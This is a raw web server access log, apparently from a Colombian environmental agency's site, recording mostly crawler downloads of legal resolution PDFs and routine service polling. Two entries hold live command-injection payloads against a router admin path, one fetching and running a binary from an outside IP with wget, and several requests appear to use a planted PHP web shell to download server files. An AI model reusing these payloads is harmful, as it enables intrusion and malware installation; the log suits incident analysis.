216.244.66.195 - - [04/Jul/2024:07:42:43 -0500] "GET /BLA/resoluciones/AUTOS%202009/0864.pdf HTTP/1.1" 200 86989
216.244.66.195 - - [04/Jul/2024:07:42:46 -0500] "GET /BLA/resoluciones/AUTOS%202009/1204.pdf HTTP/1.1" 200 123280
216.244.66.195 - - [04/Jul/2024:07:42:48 -0500] "GET /BLA/resoluciones/AUTOS%202009/1319.pdf HTTP/1.1" 200 105675
216.244.66.195 - - [04/Jul/2024:07:42:51 -0500] "GET /BLA/resoluciones/AUTOS%202009/1358.pdf HTTP/1.1" 200 88189
216.244.66.195 - - [04/Jul/2024:07:42:54 -0500] "GET /BLA/resoluciones/AUTOS%202009/1366.pdf HTTP/1.1" 200 116621
216.244.66.195 - - [04/Jul/2024:07:42:57 -0500] "GET /BLA/resoluciones/AUTOS%202009/1413.pdf HTTP/1.1" 200 193731
216.244.66.195 - - [04/Jul/2024:07:43:08 -0500] "GET /BLA/resoluciones/AUTOS%202009/1455.pdf HTTP/1.1" 200 161043
157.55.39.57 - - [04/Jul/2024:07:43:08 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12731
216.244.66.195 - - [04/Jul/2024:07:43:16 -0500] "GET /BLA/resoluciones/AUTOS%202009/1577.pdf HTTP/1.1" 200 119960
216.244.66.195 - - [04/Jul/2024:07:43:22 -0500] "GET /BLA/resoluciones/AUTOS%202009/1685.pdf HTTP/1.1" 200 124349
216.244.66.195 - - [04/Jul/2024:07:43:28 -0500] "GET /BLA/resoluciones/AUTOS%202009/1722.pdf HTTP/1.1" 200 124265
201.245.192.253 - - [04/Jul/2024:07:43:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [04/Jul/2024:07:43:33 -0500] "GET /BLA/resoluciones/AUTOS%202009/1762.pdf HTTP/1.1" 200 101672
216.244.66.195 - - [04/Jul/2024:07:43:37 -0500] "GET /BLA/resoluciones/AUTOS%202009/1904.pdf HTTP/1.1" 200 379520
216.244.66.195 - - [04/Jul/2024:07:43:41 -0500] "GET /BLA/resoluciones/AUTOS%202009/1924.pdf HTTP/1.1" 200 182898
216.244.66.195 - - [04/Jul/2024:07:43:46 -0500] "GET /BLA/resoluciones/AUTOS%202009/1929.pdf HTTP/1.1" 200 209476
216.244.66.195 - - [04/Jul/2024:07:43:50 -0500] "GET /BLA/resoluciones/AUTOS%202009/2046.pdf HTTP/1.1" 200 233008
216.244.66.195 - - [04/Jul/2024:07:43:54 -0500] "GET /BLA/resoluciones/AUTOS%202009/2158.pdf HTTP/1.1" 200 102654
216.244.66.195 - - [04/Jul/2024:07:43:57 -0500] "GET /BLA/resoluciones/AUTOS%202009/2165.pdf HTTP/1.1" 200 93995
216.244.66.195 - - [04/Jul/2024:07:44:00 -0500] "GET /BLA/resoluciones/AUTOS%202009/2253.pdf HTTP/1.1" 200 121790
216.244.66.195 - - [04/Jul/2024:07:44:03 -0500] "GET /BLA/resoluciones/AUTOS%202009/2259.pdf HTTP/1.1" 200 120736
201.245.192.253 - - [04/Jul/2024:07:44:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
216.244.66.195 - - [04/Jul/2024:07:44:07 -0500] "GET /BLA/resoluciones/AUTOS%202009/2803.pdf HTTP/1.1" 200 103262
216.244.66.195 - - [04/Jul/2024:07:44:10 -0500] "GET /BLA/resoluciones/AUTOS%202009/2846.pdf HTTP/1.1" 200 71994
201.245.192.253 - - [04/Jul/2024:07:44:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [04/Jul/2024:07:44:13 -0500] "GET /BLA/resoluciones/AUTOS%202009/2887.pdf HTTP/1.1" 200 81496
216.244.66.195 - - [04/Jul/2024:07:44:17 -0500] "GET /BLA/resoluciones/AUTOS%202011/0134.pdf HTTP/1.1" 200 165347
157.55.39.60 - - [04/Jul/2024:07:44:20 -0500] "GET /BLA/resoluciones/AUTOS%202012/1731.pdf HTTP/1.1" 304 -
216.244.66.195 - - [04/Jul/2024:07:44:21 -0500] "GET /BLA/resoluciones/AUTOS%202011/0135.pdf HTTP/1.1" 200 135681
66.249.73.37 - - [04/Jul/2024:07:44:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%2001-%2050/00000027.tif HTTP/1.1" 200 30260
216.244.66.195 - - [04/Jul/2024:07:44:24 -0500] "GET /BLA/resoluciones/AUTOS%202011/0241.pdf HTTP/1.1" 200 334070
216.244.66.195 - - [04/Jul/2024:07:44:29 -0500] "GET /BLA/resoluciones/AUTOS%202011/0247.pdf HTTP/1.1" 200 167532
201.245.192.253 - - [04/Jul/2024:07:44:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [04/Jul/2024:07:44:33 -0500] "GET /BLA/resoluciones/AUTOS%202011/0257.pdf HTTP/1.1" 200 553486
66.249.73.36 - - [04/Jul/2024:07:44:34 -0500] "GET /Publicaciones/2024EE85787.pdf HTTP/1.1" 404 227
216.244.66.195 - - [04/Jul/2024:07:44:44 -0500] "GET /BLA/resoluciones/AUTOS%202011/0849.pdf HTTP/1.1" 200 95593
216.244.66.195 - - [04/Jul/2024:07:44:53 -0500] "GET /BLA/resoluciones/AUTOS%202011/0955.pdf HTTP/1.1" 200 159871
40.77.167.22 - - [04/Jul/2024:07:44:54 -0500] "GET /semana-bogota-reverdece-con-exito-finaliza-el-primer-dia-de-la-convencion-internacional-de-emergencia-climatica.html HTTP/1.1" 200 898
216.244.66.195 - - [04/Jul/2024:07:45:00 -0500] "GET /BLA/resoluciones/AUTOS%202011/1295.pdf HTTP/1.1" 200 161665
216.244.66.195 - - [04/Jul/2024:07:45:06 -0500] "GET /BLA/resoluciones/AUTOS%202011/1331.pdf HTTP/1.1" 200 152045
216.244.66.195 - - [04/Jul/2024:07:45:12 -0500] "GET /BLA/resoluciones/AUTOS%202011/1666.pdf HTTP/1.1" 200 282408
216.244.66.195 - - [04/Jul/2024:07:45:17 -0500] "GET /BLA/resoluciones/AUTOS%202011/1815.pdf HTTP/1.1" 200 153171
216.244.66.195 - - [04/Jul/2024:07:45:21 -0500] "GET /BLA/resoluciones/AUTOS%202011/1862.pdf HTTP/1.1" 200 94623
216.244.66.195 - - [04/Jul/2024:07:45:25 -0500] "GET /BLA/resoluciones/AUTOS%202011/2104.pdf HTTP/1.1" 200 253630
216.244.66.195 - - [04/Jul/2024:07:45:30 -0500] "GET /BLA/resoluciones/AUTOS%202011/2144.pdf HTTP/1.1" 200 256438
201.245.192.253 - - [04/Jul/2024:07:45:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [04/Jul/2024:07:45:34 -0500] "GET /BLA/resoluciones/AUTOS%202011/2194.pdf HTTP/1.1" 200 248783
162.55.170.174 - - [04/Jul/2024:07:45:36 -0500] "GET / HTTP/1.1" 200 4720
66.249.73.38 - - [04/Jul/2024:07:45:36 -0500] "GET /BLA/resoluciones/AUTOS%202018/6327.pdf HTTP/1.1" 304 -
216.244.66.195 - - [04/Jul/2024:07:45:37 -0500] "GET /BLA/resoluciones/AUTOS%202011/2198.pdf HTTP/1.1" 200 299332
216.244.66.195 - - [04/Jul/2024:07:45:41 -0500] "GET /BLA/resoluciones/AUTOS%202011/2528.pdf HTTP/1.1" 200 176520
216.244.66.195 - - [04/Jul/2024:07:45:43 -0500] "GET /BLA/resoluciones/AUTOS%202011/2535.pdf HTTP/1.1" 200 153057
216.244.66.195 - - [04/Jul/2024:07:45:46 -0500] "GET /BLA/resoluciones/AUTOS%202011/2689.pdf HTTP/1.1" 200 143393
216.244.66.195 - - [04/Jul/2024:07:45:48 -0500] "GET /BLA/resoluciones/AUTOS%202011/2715.pdf HTTP/1.1" 200 149583
216.244.66.195 - - [04/Jul/2024:07:45:50 -0500] "GET /BLA/resoluciones/AUTOS%202011/3084.pdf HTTP/1.1" 200 198887
216.244.66.195 - - [04/Jul/2024:07:45:52 -0500] "GET /BLA/resoluciones/AUTOS%202011/3301.pdf HTTP/1.1" 200 217181
216.244.66.195 - - [04/Jul/2024:07:45:55 -0500] "GET /BLA/resoluciones/AUTOS%202011/3593.pdf HTTP/1.1" 200 259050
216.244.66.195 - - [04/Jul/2024:07:45:57 -0500] "GET /BLA/resoluciones/AUTOS%202013/0063.pdf HTTP/1.1" 200 1383002
216.244.66.195 - - [04/Jul/2024:07:46:02 -0500] "GET /BLA/resoluciones/AUTOS%202013/0167.pdf HTTP/1.1" 200 621223
201.245.192.253 - - [04/Jul/2024:07:46:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:07:46:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
92.249.48.202 - - [04/Jul/2024:07:46:30 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [04/Jul/2024:07:44:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [04/Jul/2024:07:46:38 -0500] "GET /BLA/resoluciones/AUTOS%202013/0274.pdf HTTP/1.1" 200 1140041
216.244.66.195 - - [04/Jul/2024:07:47:09 -0500] "GET /BLA/resoluciones/AUTOS%202013/0363.pdf HTTP/1.1" 200 273557
216.245.221.92 - - [04/Jul/2024:07:47:13 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Jul/2024:07:45:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55823
201.245.192.253 - - [04/Jul/2024:07:47:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:07:48:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:07:48:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:07:49:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [04/Jul/2024:07:49:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.73.38 - - [04/Jul/2024:07:49:44 -0500] "HEAD /bla/resoluciones/autos%202012/0800.pdf HTTP/1.1" 200 -
66.249.73.38 - - [04/Jul/2024:07:49:44 -0500] "HEAD /bla/resoluciones/autos%202012/0800.pdf HTTP/1.1" 200 -
172.22.2.4 - - [04/Jul/2024:07:50:05 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [04/Jul/2024:07:50:06 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [04/Jul/2024:07:50:06 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [04/Jul/2024:07:50:07 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [04/Jul/2024:07:50:07 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [04/Jul/2024:07:50:07 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [04/Jul/2024:07:50:07 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [04/Jul/2024:07:50:08 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 206 500
172.22.2.4 - - [04/Jul/2024:07:50:08 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 206 500
172.22.2.4 - - [04/Jul/2024:07:50:08 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 206 500
172.22.2.4 - - [04/Jul/2024:07:50:09 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 206 263
201.245.192.253 - - [04/Jul/2024:07:50:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:07:50:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [04/Jul/2024:07:50:55 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [04/Jul/2024:07:51:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:07:52:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [04/Jul/2024:07:52:13 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Jul/2024:07:50:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:07:52:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.73.38 - - [04/Jul/2024:07:52:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/3950.pdf HTTP/1.1" 200 679181
66.249.73.36 - - [04/Jul/2024:07:52:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%20551-600/00000556.tif HTTP/1.1" 200 104100
141.98.83.197 - - [04/Jul/2024:07:53:05 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [04/Jul/2024:07:51:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
206.1.210.142 - - [04/Jul/2024:07:53:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0520.pdf HTTP/1.1" 200 489134
201.245.192.253 - - [04/Jul/2024:07:53:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:07:54:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [04/Jul/2024:07:54:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:07:54:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.102.61.207 - - [04/Jul/2024:07:54:33 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/4vOxghX7HTD5GPT3YddvCeZS2tvGgyDQzdT+8W/PbQU/HMXQCXkVl&y=U2FsdGVkX1+yKy7zQUY3ku7iJFhWWTU7a7O7uNqPOYAUDVKJOuzIQxmLaWfsrUuq HTTP/1.1" 200 30
186.102.61.207 - - [04/Jul/2024:07:54:33 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX195boA9RJSLJDHFL1xSUj1qHtbs5HhNGyy38fRNWSoy9Cpg8Fv/kbg4Z9BT1Wa+4zuNNyAW4NM6/j3BBQfI/CX/VQUAYKo6UMM=&u=U2FsdGVkX1/+uHlcBxQBbK1gRb4tjMpsLM8DMi/Zn8VCaRsNa+DrwO84ljkP9DsU&y=U2FsdGVkX1+yKy7zQUY3ku7iJFhWWTU7a7O7uNqPOYAUDVKJOuzIQxmLaWfsrUuq HTTP/1.1" 200 97
186.102.61.207 - - [04/Jul/2024:07:54:33 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18WILw3CssF/z/tipd0xbtNBnVLRg51jD4ZZePEF2/+bRgFusHFNxljPYgIyQcnFfMXsyle+pqRpJ7fb3lLffPWjKuTWOEuvJFtSTmxsoeGI9vQaskKsTVkaVk4+Y3OFnLgjaQyf5H/oGjB61GlKplfEZSchXamsXL9nkoR0bowY2HGDLH3ZOEHsJSxqDqnp+q1LDty16vNzVSfAM067lZRK10rrkQnMjoF8c5efEddXfx0dJqrt5/adm/z5ab67wzUi3ootjiMRWt+bk0XJ2IppZJld3BSknGh+PQ80FOWKjAaghZh91ULrxqrM/5Nt2/W3iPNpL1Fdyc9d76fSkKTyorRzoH3HPFDK5qY9IPjoPEUbUa5/3BHJ43g0Y4K9vfYupGdcMlxEn6CG349ES9chiyitcniRicUyQyLQjHtUfbc46gUQEkSlcVJQ9uNB4LuBjCxeI2eKrhUFVa4Uwt+HhbvVkExdmCmU4wjys2aG5x5eH9j1Us+khpechXaK3twPfauxjyJavRevbWYsTFNiDUcXUk61UDRWXcFx0YdyDqVON6o1EaP/z8VVP/93JAKs0jmBN+Z7u/nLCgfgPkSDrBs11VVUlmb3VNBjIoBT+WFDtbIw92kRvjzxlDdxfppBa2O7TNbuC/ktxBeWG2RuLZ2lr4Vt8nx/Ml9EZWWenEBVW2cEKhfS1UGONJMAdU1XdpSkSPCORKLr7+sLX4hmEirSv6KgkWLoo52JTaQo/lQ5nJW32CbwUVo1yFtzRHnroWLM34jgJ0cT+W4bJp6G8B6BBZKoBGY7njXaFk0OqR113GtWkh2n14e4JplnBZQvHdzmgFKx6QWwOW+TpofwBMvzRFvX6Fd6wgKNNA7XPA6nUz00yp3WeKkbhbxxBRer/MCj4A8QVCoSp10uW42J5wS+EgHanYjDC8ojPwb6HLsQWb+3Gd0L4v6cbG6Ab6/yCNp9CalCHLnYW483Vkr5zuvt7O9fPFDQL3d8s5UTJGi2b4fmHoiQssp4Lqaw7xtD4AXWm81DTZcg/uo10sn7bsPe3jpUzW66bDfsaOZr5fGUt/x0lTi2R6dxAwCzEhimG1dYWwgifRnqqxky5KF74KBzM714AAfgLpEICBTidNvJfeproimV/AXymUGDAUyssZXjNwAaTfLi6MiUKLI5tt/xrMMy3LKa1mCN9x4Y8SrotswlZ9gUPH7LaxZ8gzbbVpR8AIQO6xaweuY9NQNB4QHBDfN0uB/CCaXp4Hzh/xMRNWl92mB/EgpVduEH5MYxji6B07EZKaaOENz/EGD6H7aPBQf2wE2cYW/aGH6jc7eKzAe98hCg6ZYFw1BeTdXypNHro04DYoHBxcFCILhETTmeE8/GwbHOKU6cDPDBC+FmVWkk3iHl2p381ouGoKXQFFQRMpfGzo17LYi2ywNzw0QqLRq8l1LyvQ26Pq+ECNzDA3wXEZX0P+5ZRzB2tg1n1X50WraTMOwlJoRJOgjYNXCOCtdTxIuUuu8IbhDdtb3wBPjzJAQP+BbkP2frWZNhnySxmUuXM0FX4tkZBN2ev0LV5Mkjet+Yi4hnC8Rad/JkIt07YCyRnTFN4LHkIYG4Cz6V1ldVP30/tLeA4PSYSdtGKECDK/X+HBmbhKxzQrFyXViUCmAsaRlfDPR/vp/qdBItmyNkTlY5CW7fT3KryJiyOt8KrwF/YJ/OsOx/7hC4s9NskdcbVDpvRYt8DfLMbs/JintQfLrTNu4yCdgx24/iQhf2DjdsSoCUKIGBUmyMZQvFxVu&u=U2FsdGVkX1/+uHlcBxQBbK1gRb4tjMpsLM8DMi/Zn8VCaRsNa+DrwO84ljkP9DsU&y=U2FsdGVkX1+yKy7zQUY3ku7iJFhWWTU7a7O7uNqPOYAUDVKJOuzIQxmLaWfsrUuq HTTP/1.1" 200 1063
186.102.61.207 - - [04/Jul/2024:07:54:33 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/qjhL95k5FPpO8VcJt+Hal2y8lACkDYQ4qMIvKxvrAHI8dHPAvnDGyS+A/HjhKU2Z0iUJZJha6RxcHiXUhJ2dFLadRc6eGj0Ev2yyOd8kLhwEVxybRuhMnbvaH9ZumP6xafuvdMH1HWRHl4TNMtfNkXuenFl7Y+C6gdJNPqigQiyAXb0HBxV6W4kQ0KMcVYZzicu185lirA/uJ57zO55M4guZQNRH8x3A4DtyKAsz6PBqFZ7rNYCaVgA0l7eIB4PFrSqawWT+FmdxJ8VlEPUCPQENmaYdSKEVWiKB8CNcAcPpRbW9kQS7gAFWLnc1KmudjPSepreO42tkAnPa5oJDKoUx+nUWYfJAH0pzsZYBXvQoet++4YZwzbxHaz1+cpw6of6OXa4KTYIyIZfmQMy8lwPN9e+cjT6i/9RRTTQe6RzRTvKki0sdA4X06bo+FJEX5y4+zBHEOyEZVBVsBSorwI7ezEEP32/RCgsg8oI/D+lex7rkYFpAq+p8fxkJbY5p7w7+8Es/09yHB7Fm9Q09R73BXGzPgW3k4UIYjsvBOAQ6gnrkSYzSyc14zArpGvMjuDEujKHyKa3C2BBeefkKY9C1iH1oPftSRYPbvPzN+XYq2yytIxixmsQn4G6LbGSyPUaGmytdsUlG35r1GemUKKkqYflBmBNNkziMDmfD4jsrwbgv7pYf0KB7MX5zwNU/LaGzOh2mYyYVjyn5hwzabZqKu6tHOq71vRLoGCn0Fa2Eriwbp6/6/&u=U2FsdGVkX1/+uHlcBxQBbK1gRb4tjMpsLM8DMi/Zn8VCaRsNa+DrwO84ljkP9DsU&y=U2FsdGVkX1+yKy7zQUY3ku7iJFhWWTU7a7O7uNqPOYAUDVKJOuzIQxmLaWfsrUuq HTTP/1.1" 200 208
186.102.61.207 - - [04/Jul/2024:07:54:33 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1/4vOxghX7HTD5GPT3YddvCeZS2tvGgyDQzdT+8W/PbQU/HMXQCXkVl HTTP/1.1" 200 30244
183.7.125.195 - - [04/Jul/2024:07:54:58 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [04/Jul/2024:07:55:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:07:55:47 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
201.245.192.253 - - [04/Jul/2024:07:56:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:07:56:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [04/Jul/2024:07:57:13 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Jul/2024:07:55:47 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 59583
201.245.192.253 - - [04/Jul/2024:07:57:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.97.78 - - [04/Jul/2024:07:57:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=feed-atom-comments.php&ft=download&white=1 HTTP/1.1" 200 4970
47.128.53.5 - - [04/Jul/2024:07:58:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ccosmeticos%5Cimages&f=page86.swf&ft=download HTTP/1.1" 200 20754
172.22.2.4 - - [04/Jul/2024:07:56:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:07:58:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.69.65 - - [04/Jul/2024:07:58:13 -0500] "GET /desde-el-1-de-mayo-habra-nueva-normativa-para-la-gestion-de-aceites-usados-de-origen-industrial.html HTTP/1.1" 200 1006
47.128.35.46 - - [04/Jul/2024:07:58:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ccosmeticos%5Cimages&f=page32.swf&ft=download HTTP/1.1" 200 149563
201.245.192.253 - - [04/Jul/2024:07:58:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.118.202 - - [04/Jul/2024:07:58:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=5086.pdf&ft=download HTTP/1.1" 200 298663
47.128.119.36 - - [04/Jul/2024:07:58:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cmetalmecanica%5Cimages&f=page67.swf&ft=download HTTP/1.1" 200 30306
201.245.192.253 - - [04/Jul/2024:07:59:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
172.22.2.4 - - [04/Jul/2024:07:57:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
45.148.10.174 - - [04/Jul/2024:07:59:03 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
45.148.10.174 - - [04/Jul/2024:07:59:03 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
47.128.56.63 - - [04/Jul/2024:07:59:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1487.pdf&ft=download&white=1 HTTP/1.1" 200 356007
172.22.2.4 - - [04/Jul/2024:07:59:12 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [04/Jul/2024:07:59:12 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [04/Jul/2024:07:59:12 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [04/Jul/2024:07:59:12 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [04/Jul/2024:07:59:12 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [04/Jul/2024:07:59:12 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [04/Jul/2024:07:59:13 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [04/Jul/2024:07:59:14 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
47.128.41.93 - - [04/Jul/2024:07:59:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cxampp%5C&f=start.php&ft=download&white=1 HTTP/1.1" 200 1448
172.22.2.4 - - [04/Jul/2024:07:59:26 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=0897&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [04/Jul/2024:07:59:30 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=0897&usuario=&sector=&fecha=2023&resuelve= HTTP/1.1" 200 2053
172.22.2.4 - - [04/Jul/2024:07:59:30 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:07:59:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.28.59 - - [04/Jul/2024:07:59:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cmetalmecanica%5Cimages&f=page69.swf&ft=download HTTP/1.1" 200 74429
172.22.2.4 - - [04/Jul/2024:07:59:45 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0897&usuario=&sector=&fecha=2023&resuelve= HTTP/1.1" 200 1058
172.22.2.4 - - [04/Jul/2024:07:59:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
186.154.35.60 - - [04/Jul/2024:07:59:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/0897.pdf HTTP/1.1" 200 509328
